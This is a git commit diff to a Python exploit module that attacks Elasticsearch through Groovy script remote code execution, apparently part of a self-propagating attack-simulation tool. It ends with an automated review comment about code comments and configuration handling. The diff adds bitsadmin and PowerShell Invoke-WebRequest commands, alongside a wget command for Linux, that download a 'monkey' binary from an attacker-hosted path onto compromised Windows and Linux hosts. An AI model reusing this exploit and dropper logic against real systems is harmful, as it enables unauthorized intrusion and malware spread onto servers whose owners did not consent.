Commands tested and working on windows.

This commit is contained in:
Vakaris 2018-07-24 15:55:34 +03:00
parent 7e2cc86ab9
commit a54eedec11
1 changed files with 19 additions and 6 deletions


@ -6,13 +6,14 @@
import json import json
import logging import logging
import requests import requests
from model import DROPPER_ARG
from network.elasticfinger import ES_SERVICE, ES_PORT from network.elasticfinger import ES_SERVICE, ES_PORT
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
from exploit.web_rce import WebRCE from exploit.web_rce import WebRCE
from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
import copy
import re
__author__ = 'danielg' __author__ = 'danielg'
@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE):
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
# Both commands are prepared for use in future development
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host): def __init__(self, host):
@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE):
if not vulnerable_urls: if not vulnerable_urls:
return False return False
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): # Extra escaping required:
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
LOG.info("Host %s was already infected under the current configuration, done" % self.host) LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
return False return False
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) commands = {'windows': self.RDP_CMDLINE_HTTP,
'linux': WGET_HTTP_UPLOAD}
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
# We can't use 'if not' because response may be '' # We can't use 'if not' because response may be ''
if data is not False and data['response'] == False: if data is not False and data['response'] == False:
@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE):
payload = self.JAVA_CMD % command payload = self.JAVA_CMD % command
response = requests.get(url, data=payload) response = requests.get(url, data=payload)
result = self.get_results(response) result = self.get_results(response)
if not result: # not vulnerable if not result:
return False return False
return result[0] return result[0]
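Review bot: The new comment `# Both commands are prepared for use in future development` above RDP_CMDLINE_HTTP is contradicted a few lines later, where the `commands` dict passes `self.RDP_CMDLINE_HTTP` as the live Windows download command; it should state which constant is actually unused, e.g. `# RDP_CMDLINE_HTTP is the Windows download command used below; POWERSHELL_COMMAND is kept for future use`. In the same method, the deepcopy of `self._config` is immediately overwritten with hard-coded, pre-escaped literals for `dropper_target_path_win_32` and `dropper_target_path_win_64`, so whatever Windows target paths the operator configured are silently ignored by this exploiter and the copied config will drift from the real one; deriving the escaped form from the configured values, or at least commenting that the override is deliberate and only feeds check_remote_files and upload_monkey, would keep the configuration authoritative. The `# Extra escaping required:` comment should also say which layer the quadrupled backslashes are for, since a reader cannot tell from the hunk whether the literal is escaped for the Groovy payload built from JAVA_CMD, for the request body, or for the remote shell. The enclosing method begins before this hunk and continues past it.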